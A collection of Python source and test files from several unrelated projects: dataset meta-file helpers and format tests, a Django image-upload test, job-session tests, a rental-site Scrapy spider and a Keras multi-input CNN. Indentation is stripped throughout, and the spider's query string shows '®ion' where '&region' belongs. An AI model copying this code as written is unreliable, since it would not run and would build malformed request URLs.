SynthiaPath.IMAGES_DIR, SynthiaPath.LABELS_SEGM_DIR, SynthiaPath.SEMANTIC_SEGM_DIR
):
with context.alternative():
context.require_file(f'{prefix}/**/*.png')
@classmethod
def find_sources(cls, path):
return [{'url': path, 'format': 'synthia'}]
```
#### File: datumaro/util/meta_file_util.py
```python
from collections import OrderedDict
import json
import os.path as osp
from datumaro.components.annotation import AnnotationType
from datumaro.util import find
DATASET_META_FILE = 'dataset_meta.json'
def is_meta_file(path):
return osp.splitext(osp.basename(path))[1] == '.json'
def has_meta_file(path):
return osp.isfile(get_meta_file(path))
def get_meta_file(path):
return osp.join(path, DATASET_META_FILE)
def parse_meta_file(path):
meta_file = path
if osp.isdir(path):
meta_file = get_meta_file(path)
with open(meta_file) as f:
dataset_meta = json.load(f)
label_map = OrderedDict()
for label in dataset_meta.get('labels', []):
label_map[label] = None
colors = dataset_meta.get('segmentation_colors', [])
for i, label in dataset_meta.get('label_map', {}).items():
label_map[label] = None
if any(colors) and colors[int(i)] is not None:
label_map[label] = tuple(colors[int(i)])
return label_map
def save_meta_file(path, categories):
dataset_meta = {}
labels = [label.name for label in categories[AnnotationType.label]]
dataset_meta['labels'] = labels
if categories.get(AnnotationType.mask):
label_map = {}
segmentation_colors = []
for i, color in categories[AnnotationType.mask].colormap.items():
if color:
segmentation_colors.append([int(color[0]), int(color[1]), int(color[2])])
label_map[str(i)] = labels[i]
dataset_meta['label_map'] = label_map
dataset_meta['segmentation_colors'] = segmentation_colors
bg_label = find(categories[AnnotationType.mask].colormap.items(),
lambda x: x[1] == (0, 0, 0))
if bg_label is not None:
dataset_meta['background_label'] = str(bg_label[0])
meta_file = path
if osp.isdir(path):
meta_file = get_meta_file(path)
with open(meta_file, 'w') as f:
json.dump(dataset_meta, f)
```
#### File: tests/cli/test_filter.py
```python
from unittest import TestCase
import os.path as osp
from datumaro.components.annotation import Bbox, Label
from datumaro.components.dataset import Dataset
from datumaro.components.errors import ReadonlyDatasetError
from datumaro.components.extractor import DatasetItem
from datumaro.components.project import Project
from datumaro.util.scope import scope_add, scoped
from datumaro.util.test_utils import TestDir, compare_datasets
from datumaro.util.test_utils import run_datum as run
from ..requirements import Requirements, mark_requirement
class FilterTest(TestCase):
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
@scoped
def test_can_filter_dataset_inplace(self):
test_dir = scope_add(TestDir())
Dataset.from_iterable([
DatasetItem(1, annotations=[Label(0)]),
DatasetItem(2, annotations=[Label(1)]),
], categories=['a', 'b']).export(test_dir, 'coco')
run(self, 'filter', '-e', '/item[id = "1"]', '--overwrite',
test_dir + ':coco')
expected_dataset = Dataset.from_iterable([
DatasetItem(1, annotations=[Label(0, id=1, group=1)]),
], categories=['a', 'b'])
compare_datasets(self, expected_dataset,
Dataset.import_from(test_dir, 'coco'), ignored_attrs='*')
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_filter_fails_on_inplace_update_without_overwrite(self):
with TestDir() as test_dir:
Dataset.from_iterable([
DatasetItem(id=1, annotations=[ Bbox(1, 2, 3, 4, label=1) ]),
], categories=['a', 'b']).export(test_dir, 'coco')
run(self, 'filter', '-e', '/item', test_dir + ':coco',
expected_code=1)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_filter_fails_on_inplace_update_of_stage(self):
with TestDir() as test_dir:
dataset_url = osp.join(test_dir, 'dataset')
dataset = Dataset.from_iterable([
DatasetItem(id=1, annotations=[ Bbox(1, 2, 3, 4, label=1) ]),
], categories=['a', 'b'])
dataset.export(dataset_url, 'coco', save_images=True)
project_dir = osp.join(test_dir, 'proj')
with Project.init(project_dir) as project:
project.import_source('source-1', dataset_url, 'coco',
no_cache=True)
project.commit('first commit')
with self.subTest('without overwrite'):
run(self, 'filter', '-p', project_dir,
'-e', '/item', 'HEAD:source-1',
expected_code=1)
with self.subTest('with overwrite'):
with self.assertRaises(ReadonlyDatasetError):
run(self, 'filter', '-p', project_dir, '--overwrite',
'-e', '/item', 'HEAD:source-1')
```
#### File: datumaro/tests/test_image_dir_format.py
```python
from unittest import TestCase
import os
import os.path as osp
import numpy as np
from datumaro.components.extractor import DatasetItem
from datumaro.components.media import Image
from datumaro.components.project import Dataset
from datumaro.plugins.image_dir_format import ImageDirConverter
from datumaro.util.image import save_image
from datumaro.util.test_utils import (
TestDir, check_save_and_load, compare_datasets,
)
from .requirements import Requirements, mark_requirement
class ImageDirFormatTest(TestCase):
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_load(self):
dataset = Dataset.from_iterable([
DatasetItem(id=1, image=np.ones((10, 6, 3))),
DatasetItem(id=2, image=np.ones((5, 4, 3))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir', require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_relative_paths(self):
dataset = Dataset.from_iterable([
DatasetItem(id='1', image=np.ones((4, 2, 3))),
DatasetItem(id='subdir1/1', image=np.ones((2, 6, 3))),
DatasetItem(id='subdir2/1', image=np.ones((5, 4, 3))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir')
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_save_dataset_with_cyrillic_and_spaces_in_filename(self):
dataset = Dataset.from_iterable([
DatasetItem(id='кириллица с пробелом', image=np.ones((4, 2, 3))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir')
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_save_and_load_image_with_arbitrary_extension(self):
dataset = Dataset.from_iterable([
DatasetItem(id='q/1', image=Image(path='q/1.JPEG',
data=np.zeros((4, 3, 3)))),
DatasetItem(id='a/b/c/2', image=Image(path='a/b/c/2.bmp',
data=np.zeros((3, 4, 3)))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir', require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_save_and_load_image_with_custom_extension(self):
expected = Dataset.from_iterable([
DatasetItem(id='a/3', image=Image(path='a/3.qq',
data=np.zeros((3, 4, 3)))),
])
with TestDir() as test_dir:
image_path = osp.join(test_dir, 'a', '3.jpg')
save_image(image_path, expected.get('a/3').image.data,
create_dir=True)
os.rename(image_path, osp.join(test_dir, 'a', '3.qq'))
actual = Dataset.import_from(test_dir, 'image_dir', exts='qq')
compare_datasets(self, expected, actual, require_images=True)
```
#### File: datumaro/tests/test_mars_format.py
```python
from unittest.case import TestCase
import os.path as osp
import numpy as np
from datumaro.components.annotation import Label
from datumaro.components.dataset import Dataset, DatasetItem
from datumaro.components.environment import Environment
from datumaro.plugins.mars_format import MarsImporter
from datumaro.util.test_utils import compare_datasets
from tests.requirements import Requirements, mark_requirement
ASSETS_DIR = osp.join(osp.dirname(__file__), 'assets')
DUMMY_MARS_DATASET = osp.join(ASSETS_DIR, 'mars_dataset')
class MarsImporterTest(TestCase):
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_import(self):
expected_dataset = Dataset.from_iterable([
DatasetItem(id='0001C1T0001F001', image=np.ones((10, 10, 3)),
subset='train', annotations=[Label(label=2)],
attributes={'person_id': '0001', 'camera_id': 1, 'track_id': 1,
'frame_id': 1}
),
DatasetItem(id='0000C6T0101F001', image=np.ones((10, 10, 3)),
subset='train', annotations=[Label(label=1)],
attributes={'person_id': '0000', 'camera_id': 6, 'track_id': 101,
'frame_id': 1}
),
DatasetItem(id='00-1C2T0081F201', image=np.ones((10, 10, 3)),
subset='test', annotations=[Label(label=0)],
attributes={'person_id': '00-1', 'camera_id': 2, 'track_id': 81,
'frame_id': 201}
),
], categories=['00-1', '0000', '0001'])
imported_dataset = Dataset.import_from(DUMMY_MARS_DATASET, 'mars')
compare_datasets(self, expected_dataset, imported_dataset, require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_detect(self):
detected_formats = Environment().detect_dataset(DUMMY_MARS_DATASET)
self.assertEqual([MarsImporter.NAME], detected_formats)
```
|
{
"source": "jenhaoyang/Disfactory",
"score": 2
}
|
#### File: views/tests/test_image_c.py
```python
from datetime import datetime, timezone
from unittest.mock import patch
from pathlib import Path
from freezegun import freeze_time
from django.test import TestCase, Client
from django.conf import settings
from api.models import Image
HERE = Path(__file__).resolve().parent
FAKE_IMGUR_PATH = "https://i.imgur.com/RxArJUc.png"
class PostImageViewTestCase(TestCase):
@patch("api.views.image_c._upload_image", return_value=FAKE_IMGUR_PATH)
def test_image_with_exif_db_correct(self, patch_upload):
cli = Client()
test_time = datetime(2019, 11, 11, 11, 11, 11, tzinfo=timezone.utc)
with freeze_time(test_time):
with open(HERE / "20180311_132133.jpg", "rb") as f_img:
resp = cli.post("/api/images", {'image': f_img}, format='multipart')
self.assertEqual(resp.status_code, 200)
resp_data = resp.json()
self.assertIn('token', resp_data)
img_id = resp_data['token']
img = Image.objects.get(pk=img_id)
self.assertEqual(img.image_path, FAKE_IMGUR_PATH)
self.assertEqual(img.created_at, test_time)
self.assertEqual(img.orig_time, datetime(2018, 3, 11, 13, 21, 33, tzinfo=timezone.utc))
@patch("api.views.image_c._get_image_original_date", return_value=None)
@patch("api.views.image_c._upload_image", return_value=FAKE_IMGUR_PATH)
def test_image_without_exif_db_correct(self, patch_upload, _):
cli = Client()
test_time = datetime(2019, 11, 11, 11, 11, 11, tzinfo=timezone.utc)
with freeze_time(test_time):
with open(HERE / "20180311_132133.jpg", "rb") as f_img:
resp = cli.post("/api/images", {'image': f_img}, format='multipart')
resp_data = resp.json()
self.assertEqual(resp.status_code, 200)
self.assertIn('token', resp_data)
img_id = resp_data['token']
img = Image.objects.get(pk=img_id)
self.assertEqual(img.image_path, FAKE_IMGUR_PATH)
self.assertEqual(img.created_at, test_time)
self.assertIsNone(img.orig_time)
@patch("api.views.image_c._upload_image", return_value=FAKE_IMGUR_PATH)
def test_return_400_if_not_image(self, patch_upload):
cli = Client()
with open(HERE / "test_image_c.py", "rb") as f_img:
resp = cli.post("/api/images", {'image': f_img}, format='multipart')
self.assertEqual(resp.status_code, 400)
```
|
{
"source": "jenhaoyang/elastic",
"score": 2
}
|
#### File: driver/test/standalone_session_test.py
```python
import datetime
import json
import os
import shutil
import tempfile
import unittest
from typing import Optional, Dict
from unittest.mock import MagicMock, patch
from torchelastic.tsm.driver.api import (
Application,
AppStatus,
AppState,
Container,
DescribeAppResponse,
Resource,
AppDryRunInfo,
Role,
AppHandle,
RunConfig,
SessionMismatchException,
UnknownAppException,
parse_app_handle,
)
from torchelastic.tsm.driver.local_scheduler import LocalScheduler
from torchelastic.tsm.driver.standalone_session import StandaloneSession, LoggingSession
from torchelastic.tsm.events import SourceType, TsmEvent
from .test_util import write_shell_script
class resource:
SMALL = Resource(cpu=1, gpu=0, memMB=1024)
MEDIUM = Resource(cpu=4, gpu=0, memMB=(4 * 1024))
LARGE = Resource(cpu=16, gpu=0, memMB=(16 * 1024))
SESSION_NAME = "test_session"
class DummySession(LoggingSession):
def _dryrun(self, app, scheduler, cfg):
return None
def scheduler_backends(self):
return []
def _schedule(self, dryrun_info: AppDryRunInfo) -> AppHandle:
return "default://test_session/test_app"
def _status(self, app_handle: AppHandle) -> Optional[AppStatus]:
return None
def _wait(self, app_handle: AppHandle) -> Optional[AppStatus]:
return None
def _list(self) -> Dict[AppHandle, Application]:
return {}
def _stop(self, app_handle: AppHandle) -> None:
pass
def _describe(self, app_handle: AppHandle) -> Optional[Application]:
return None
def _log_lines(
self,
app_handle: AppHandle,
role_name: str,
k: int = 0,
regex: Optional[str] = None,
since: Optional[datetime.datetime] = None,
until: Optional[datetime.datetime] = None,
should_tail: bool = False,
):
return iter(["test_log"])
@patch("torchelastic.tsm.driver.standalone_session.record")
class LoggingSessionTest(unittest.TestCase):
def assert_tsm_event(self, expected: TsmEvent, actual: TsmEvent):
self.assertEqual(expected.session, actual.session)
self.assertEqual(expected.app_id, actual.app_id)
self.assertEqual(expected.api, actual.api)
self.assertEqual(expected.source, actual.source)
def test_status_success(self, record_tsm_mock):
session = DummySession("test_session")
session.status("default://test_session/test_app")
actual_tsm_event = record_tsm_mock.call_args[0][0] # first arg
self.assert_tsm_event(
session._generate_tsm_event(
"status", "default", "test_app", source=SourceType.EXTERNAL
),
actual_tsm_event,
)
def test_status_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_status") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.status("default://test_session/test_app")
record_tsm_mock.assert_called()
def test_wait_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_wait") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.wait("default://test_session/test_app")
record_tsm_mock.assert_called()
def test_describe_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_describe") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.describe("default://test_session/test_app")
record_tsm_mock.assert_called()
def test_list_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_list") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.list()
record_tsm_mock.assert_called()
def test_schedule_fail(self, record_tsm_mock):
app_info = AppDryRunInfo("test", lambda x: "test")
app_info._scheduler = "default"
cfg = RunConfig({"image_fetcher": "dir"})
app_info._cfg = cfg
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_schedule") as schedule_mock:
schedule_mock.side_effect = RuntimeError("test error")
session.schedule(app_info)
record_tsm_mock.assert_called()
def test_schedule_success(self, record_tsm_mock):
app_info = AppDryRunInfo("test", lambda x: "test")
app_info._scheduler = "default"
cfg = RunConfig({"image_fetcher": "dir"})
app_info._cfg = cfg
session = DummySession("test_session")
app_handle = session.schedule(app_info)
actual_tsm_event = record_tsm_mock.call_args[0][0] # first arg
_, _, app_id = parse_app_handle(app_handle)
self.assert_tsm_event(
session._generate_tsm_event(
"schedule",
"default",
app_id,
runcfg=json.dumps(cfg.cfgs),
source=SourceType.EXTERNAL,
),
actual_tsm_event,
)
@patch("torchelastic.tsm.driver.standalone_session.record")
class StandaloneSessionTest(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp("StandaloneSessionTest")
write_shell_script(self.test_dir, "touch.sh", ["touch $1"])
write_shell_script(self.test_dir, "fail.sh", ["exit 1"])
write_shell_script(self.test_dir, "sleep.sh", ["sleep $1"])
self.scheduler = LocalScheduler(SESSION_NAME)
self.cfg = RunConfig({"image_fetcher": "dir"})
# resource ignored for local scheduler; adding as an example
self.test_container = Container(image=self.test_dir).require(resource.SMALL)
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_run(self, _):
test_file = os.path.join(self.test_dir, "test_file")
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertEqual(1, len(session.scheduler_backends()))
role = Role(name="touch").runs("touch.sh", test_file).on(self.test_container)
app = Application("name").of(role)
app_handle = session.run(app, cfg=self.cfg)
self.assertEqual(AppState.SUCCEEDED, session.wait(app_handle).state)
def test_dryrun(self, _):
scheduler_mock = MagicMock()
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": scheduler_mock}, wait_interval=1
)
role = Role(name="touch").runs("echo", "hello world").on(self.test_container)
app = Application("name").of(role)
session.dryrun(app, "default", cfg=self.cfg)
scheduler_mock.submit_dryrun.assert_called_once_with(app, self.cfg)
scheduler_mock._validate.assert_called_once()
def test_describe(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}
)
role = Role(name="sleep").runs("sleep.sh", "60").on(self.test_container)
app = Application("sleeper").of(role)
app_handle = session.run(app, cfg=self.cfg)
self.assertEqual(app, session.describe(app_handle))
# unknown app should return None
self.assertIsNone(session.describe("default://session1/unknown_app"))
def test_list(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
role = Role(name="touch").runs("sleep.sh", "1").on(self.test_container)
app = Application("sleeper").of(role)
num_apps = 4
for _ in range(num_apps):
# since this test validates the list() API,
# we do not wait for the apps to finish so run the apps
# in managed mode so that the local scheduler reaps the apps on exit
session.run(app)
apps = session.list()
self.assertEqual(num_apps, len(apps))
def test_evict_non_existent_app(self, _):
# tests that apps previously run with this session that are finished and eventually
# removed by the scheduler also get removed from the session after a status() API has been
# called on the app
scheduler = LocalScheduler(session_name=SESSION_NAME, cache_size=1)
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": scheduler}, wait_interval=1
)
test_file = os.path.join(self.test_dir, "test_file")
role = Role(name="touch").runs("touch.sh", test_file).on(self.test_container)
app = Application("touch_test_file").of(role)
# local scheduler was setup with a cache size of 1
# run the same app twice (the first will be removed from the scheduler's cache)
# then validate that the first one will drop from the session's app cache as well
app_id1 = session.run(app, cfg=self.cfg)
session.wait(app_id1)
app_id2 = session.run(app, cfg=self.cfg)
session.wait(app_id2)
apps = session.list()
self.assertEqual(1, len(apps))
self.assertFalse(app_id1 in apps)
self.assertTrue(app_id2 in apps)
def test_status(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
role = Role(name="sleep").runs("sleep.sh", "60").on(self.test_container)
app = Application("sleeper").of(role)
app_handle = session.run(app, cfg=self.cfg)
self.assertEqual(AppState.RUNNING, session.status(app_handle).state)
session.stop(app_handle)
self.assertEqual(AppState.CANCELLED, session.status(app_handle).state)
def test_status_unknown_app(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertIsNone(session.status("default://test_session/unknown_app_id"))
@patch("json.dumps")
def test_status_ui_url(self, json_dumps_mock, _):
app_id = "test_app"
json_dumps_mock.return_value = "{}"
mock_scheduler = MagicMock()
resp = DescribeAppResponse()
resp.ui_url = "https://foobar"
mock_scheduler.submit.return_value = app_id
mock_scheduler.describe.return_value = resp
session = StandaloneSession(
name="test_ui_url_session", schedulers={"default": mock_scheduler}
)
role = Role("ignored").runs("/bin/echo").on(self.test_container)
app_handle = session.run(Application(app_id).of(role))
status = session.status(app_handle)
self.assertEquals(resp.ui_url, status.ui_url)
@patch("json.dumps")
def test_status_structured_msg(self, json_dumps_mock, _):
app_id = "test_app"
json_dumps_mock.return_value = "{}"
mock_scheduler = MagicMock()
resp = DescribeAppResponse()
resp.structured_error_msg = '{"message": "test error"}'
mock_scheduler.submit.return_value = app_id
mock_scheduler.describe.return_value = resp
session = StandaloneSession(
name="test_structured_msg", schedulers={"default": mock_scheduler}
)
role = Role("ignored").runs("/bin/echo").on(self.test_container)
app_handle = session.run(Application(app_id).of(role))
status = session.status(app_handle)
self.assertEquals(resp.structured_error_msg, status.structured_error_msg)
def test_wait_unknown_app(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertIsNone(session.wait("default://test_session/unknown_app_id"))
self.assertIsNone(session.wait("default://another_session/some_app"))
def test_stop(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertIsNone(session.stop("default://test_session/unknown_app_id"))
with self.assertRaises(SessionMismatchException):
session.stop("default://another_session/some_app_id")
def test_log_lines_unknown_app(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
with self.assertRaises(UnknownAppException):
session.log_lines("default://test_session/unknown", "trainer")
def test_log_lines(self, _):
app_id = "mock_app"
scheduler_mock = MagicMock()
scheduler_mock.describe.return_value = DescribeAppResponse(
app_id, AppState.RUNNING
)
scheduler_mock.log_iter.return_value = iter(["hello", "world"])
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": scheduler_mock}, wait_interval=1
)
role_name = "trainer"
replica_id = 2
regex = "QPS.*"
since = datetime.datetime.now()
until = datetime.datetime.now()
lines = list(
session.log_lines(
f"default://test_session/{app_id}",
role_name,
replica_id,
regex,
since,
until,
)
)
self.assertEqual(["hello", "world"], lines)
scheduler_mock.log_iter.assert_called_once_with(
app_id, role_name, replica_id, regex, since, until, False
)
def test_no_default_scheduler(self, _):
with self.assertRaises(ValueError):
StandaloneSession(name=SESSION_NAME, schedulers={"local": self.scheduler})
@patch("json.dumps")
def test_get_schedulers(self, json_dumps_mock, _):
default_sched_mock = MagicMock()
json_dumps_mock.return_value = "{}"
local_sched_mock = MagicMock()
schedulers = {"default": default_sched_mock, "local": local_sched_mock}
session = StandaloneSession(name="test_session", schedulers=schedulers)
role = Role(name="sleep").runs("sleep.sh", "60").on(self.test_container)
app = Application("sleeper").of(role)
cfg = RunConfig()
session.run(app, scheduler="local", cfg=cfg)
local_sched_mock.submit.called_once_with(app, cfg)
```
#### File: events/test/lib_test.py
```python
import logging
import unittest
from unittest.mock import patch
from torchelastic.tsm.events import _get_or_create_logger, SourceType, TsmEvent
class TsmEventLibTest(unittest.TestCase):
def assert_event(self, actual_event: TsmEvent, expected_event: TsmEvent):
self.assertEqual(actual_event.session, expected_event.session)
self.assertEqual(actual_event.scheduler, expected_event.scheduler)
self.assertEqual(actual_event.api, expected_event.api)
self.assertEqual(actual_event.app_id, expected_event.app_id)
self.assertEqual(actual_event.runcfg, expected_event.runcfg)
self.assertEqual(actual_event.source, expected_event.source)
@patch("torchelastic.tsm.events.get_logging_handler")
def test_get_or_create_logger(self, logging_handler_mock):
logging_handler_mock.return_value = logging.NullHandler()
logger = _get_or_create_logger("test_destination")
self.assertIsNotNone(logger)
self.assertEqual(1, len(logger.handlers))
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def test_event_created(self):
event = TsmEvent(
session="test_session", scheduler="test_scheduler", api="test_api"
)
self.assertEqual("test_session", event.session)
self.assertEqual("test_scheduler", event.scheduler)
self.assertEqual("test_api", event.api)
self.assertEqual(SourceType.UNKNOWN, event.source)
def test_event_deser(self):
event = TsmEvent(
session="test_session",
scheduler="test_scheduler",
api="test_api",
source=SourceType.EXTERNAL,
)
json_event = event.serialize()
deser_event = TsmEvent.deserialize(json_event)
self.assert_event(event, deser_event)
```
|
{
"source": "jenhaoyang/rentea-crawler",
"score": 3
}
|
#### File: crawler/spiders/periodic_591_spider.py
```python
import json
import logging
from datetime import datetime, timedelta
from scrapy import Request
from scrapy_twrh.spiders.enums import DealStatusType
from scrapy_twrh.spiders.rental591 import Rental591Spider, util
from scrapy_twrh.spiders.rental591.all_591_cities import all_591_cities
from scrapy_twrh.spiders.util import clean_number
from scrapy_twrh.items import GenericHouseItem
DEFAULT_MINUTEAGO = 60
class Periodic591Spider(Rental591Spider):
name = 'periodic591'
def __init__(self, minuteago, **kwargs):
try:
minuteago = int(minuteago)
except ValueError:
minuteago = DEFAULT_MINUTEAGO
if 'target_cities' in kwargs and isinstance(kwargs['target_cities'], str):
kwargs['target_cities'] = kwargs['target_cities'].split(',')
super().__init__(
**kwargs,
parse_list=self.periodic_parse_list
)
time_ago = datetime.now() - timedelta(minutes=minuteago)
self.epoch_ago = time_ago.timestamp()
self.count_per_city = {}
for city in all_591_cities:
self.count_per_city[city['city']] = 0
def periodic_parse_list(self, response):
data = json.loads(response.text)
meta = response.meta['rental']
houses = data['data']['topData'] + data['data']['data']
has_outdated = False
for house in houses:
house['is_vip'] = 'id' not in house
# updatetime == creation time in 591...
if not house['is_vip'] and house['updatetime'] < self.epoch_ago:
has_outdated = True
else:
house_item = self.gen_shared_attrs(house, meta)
# send non-gps request first at it may be closed soon
yield self.gen_detail_request(util.DetailRequestMeta(
house_item['vendor_house_id'],
False
))
if meta.name in self.count_per_city:
self.count_per_city[meta.name] += 1
if data['data']['data'] and not has_outdated:
# only goto next page when there's response and not outdated
yield self.gen_list_request(util.ListRequestMeta(
meta.id,
meta.name,
meta.page + 1
))
else:
logging.info(f'[{meta.name}] total {self.count_per_city[meta.name]} house to crawl!')
def parse_main_response(self, response):
for item in super().parse_main_response(response):
if not isinstance(item, GenericHouseItem):
# Skip original logic about GPS request generation
continue
if item['deal_status'] == DealStatusType.NOT_FOUND:
yield item
else:
# Got an item that contains GPS!
gps_arg = {
'callback': self.parse_detail,
**self.gen_detail_request_args(util.DetailRequestMeta(
item['vendor_house_id'],
True
))
}
gps_arg['meta']['main_item'] = item
yield Request(**gps_arg)
def parse_gps_response(self, response):
for item in super().parse_gps_response(response):
# combine info from main and gps pages
item = GenericHouseItem(
**response.meta['main_item'],
rough_coordinate=item['rough_coordinate']
)
yield item
def gen_list_request_args(self, rental_meta: util.ListRequestMeta):
"""add order and orderType, so to get latest created house"""
url = "{}®ion={}&firstRow={}&order=posttime&orderType=desc".format(
util.LIST_ENDPOINT,
rental_meta.id,
rental_meta.page * self.N_PAGE
)
return {
**super().gen_list_request_args(rental_meta),
'url': url
}
```
|
{
"source": "jenhuluck/deep-learning-in-ADL",
"score": 2
}
|
#### File: deep-learning-in-ADL/SHLDataset/data_fusion3.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import tensorflow as tf
from sklearn import metrics
import h5py
import matplotlib.pyplot as plt
from tensorflow.keras import regularizers
from tensorflow.keras.layers import Input, Conv2D, Dense, Flatten, Dropout, SimpleRNN, GRU, LSTM, GlobalMaxPooling1D,GlobalMaxPooling2D,MaxPooling2D,BatchNormalization, concatenate
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam, SGD
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
import itertools
from keras.utils.vis_utils import plot_model
class models():
#def __init__(self):
def read_h5(self, path_array):
split_array = []
l = len(path_array)
for i, path in enumerate(path_array):
f = h5py.File(path, 'r')
X = f.get('inputs')
y = f.get('labels')
X = np.array(X)
y = np.array(y)
split_array.append(X) # add X to array for split
if i == l - 1:
split_array.append(y) # add y to the last
self.split = train_test_split(*split_array,test_size=0.2, random_state = 1)
'''
print(len(split))
print(split[0].shape) # data1_train_x
print(split[1].shape) # data1_test_x
print(split[2].shape) # data2_train_x
print(split[3].shape) # data2_test_x
print(split[4].shape) # y_train
print(split[5].shape) # y_test
'''
return self.split
# K is the number of classes
def create_motion_cnn(self, input_shape, K):
i = Input(shape = input_shape)
x = Conv2D(16, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(i)
x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
x = Dropout(0.2)(x)
#x = Conv2D(32, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
#x = Dropout(0.2)(x)
#x = Conv2D(256, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
#x = Conv2D(128, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(128,activation = 'relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.2)(x)
x = Dense(K,activation = 'relu')(x)
model = Model(i, x)
return model
def create_img_cnn(self, input_shape, K):
i = Input(shape = input_shape)
x = Conv2D(32, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(i)
x = BatchNormalization()(x)
x = MaxPooling2D((2,2))(x)
x = Dropout(0.2)(x)
x = Conv2D(64, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2,2))(x)
x = Dropout(0.4)(x)
x = Conv2D(128, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
x = BatchNormalization()(x)
#x = MaxPooling2D((2,2))(x)
x = Dropout(0.5)(x)
#x = Conv2D(128, (3,3), strides = 2, activation = 'relu',padding='same',kernel_regularizer=regularizers.l2(0.0005))(x)
#x = BatchNormalization()(x)
x = Flatten()(x)
#x = Dropout(0.2)(x)
x = Dense(256,activation = 'relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.2)(x)
x = Dense(K,activation = 'relu')(x)
model = Model(i, x)
return model
# merge n cnn models
def merge_models(self,n):
motion_input_shape = np.expand_dims(self.split[0], -1)[0].shape
K = len(set(self.split[-2]))
print(motion_input_shape)
cnns = [] # save all cnn models
for i in range(n-1):
cnn_i = self.create_motion_cnn(motion_input_shape,K)
cnns.append(cnn_i)
img_input_shape = np.expand_dims(self.split[-4], -1)[0].shape # last data should be image data
print(img_input_shape)
img_cnn = self.create_img_cnn(img_input_shape, K)
cnns.append(img_cnn)
#cnn1 = self.create_cnn(input_shape, K)
#cnn2 = self.create_cnn(input_shape, K)
#combinedInput = concatenate([cnn1.output, cnn2.output])
combinedInput = concatenate([c.output for c in cnns])
x = Dense(K,activation='softmax')(combinedInput)
self.mix_model = Model(inputs = [c.input for c in cnns], outputs = x)
#model = Model(inputs = [cnn1.input, cnn2.input], outputs = x)
self.mix_model.compile(optimizer = Adam(lr=0.0005),loss = 'sparse_categorical_crossentropy',metrics = ['accuracy'])
#self.r = self.mix_model.fit(x = [np.expand_dims(self.split[0],-1),self.split[]])
self.r = self.mix_model.fit(x = [np.expand_dims(self.split[i],-1) for i in range(2*n) if i % 2 == 0],
y = self.split[-2], validation_data = ([np.expand_dims(self.split[i],-1) for i in range(2*n) if i % 2 != 0],self.split[-1]),
epochs = 50, batch_size = 256 )
